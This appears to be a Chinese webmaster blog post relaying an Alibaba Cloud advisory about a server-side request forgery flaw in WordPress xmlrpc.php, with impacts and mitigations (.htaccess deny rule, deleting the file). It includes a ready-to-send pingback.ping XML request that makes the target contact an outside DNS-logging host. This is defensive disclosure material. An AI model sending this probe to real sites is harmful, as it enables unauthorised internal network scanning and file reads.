www.adminn.cn
站长正能量分享网!

WordPress xmlrpc.php 存在SSRF漏洞

阿里云提示:WordPress xmlrpc.php 存在SSRF漏洞

漏洞地址:http://域名/xmlrpc.php 验证方法:

POST http://域名/xmlrpc.php
<?xml version="1.0" encoding="iso-8859-1"?>
    <methodCall>
    <methodName>pingback.ping</methodName>
    <params>
    <param><value><string>http://n1llbu.s0x.cn/</string></value></param>
    <param><value><string>http://域名//?p=1</string></value></param>
    </params>
    </methodCall>

匹配内容:

查询到DNS请求: n1llbu.s0x.cn,说明漏洞存在

造成的影响
1、可以对业务内网进行探测。
2、攻击运行在内网或本地的应用程序(比如溢出攻击)。
3、利用file协议读取本地文件等。

安全建议
通过.htaccess屏蔽xmlrpc.php文件的访问
# protect xmlrpc

Order Deny,Allow
Deny from all

删除根目录下的xmlrpc.php。

技术参考:https://help.aliyun.com/knowledge_detail/42198.html

赞(0)
本站部分价值文章来源网络,版权归创作者所有,如有侵权或需署名或著出请联系677123@qq.com:站长分享圈 » WordPress xmlrpc.php 存在SSRF漏洞

Adminn.cn会员区

Adminn.Cn VIP会员更精彩腾讯云5折优惠券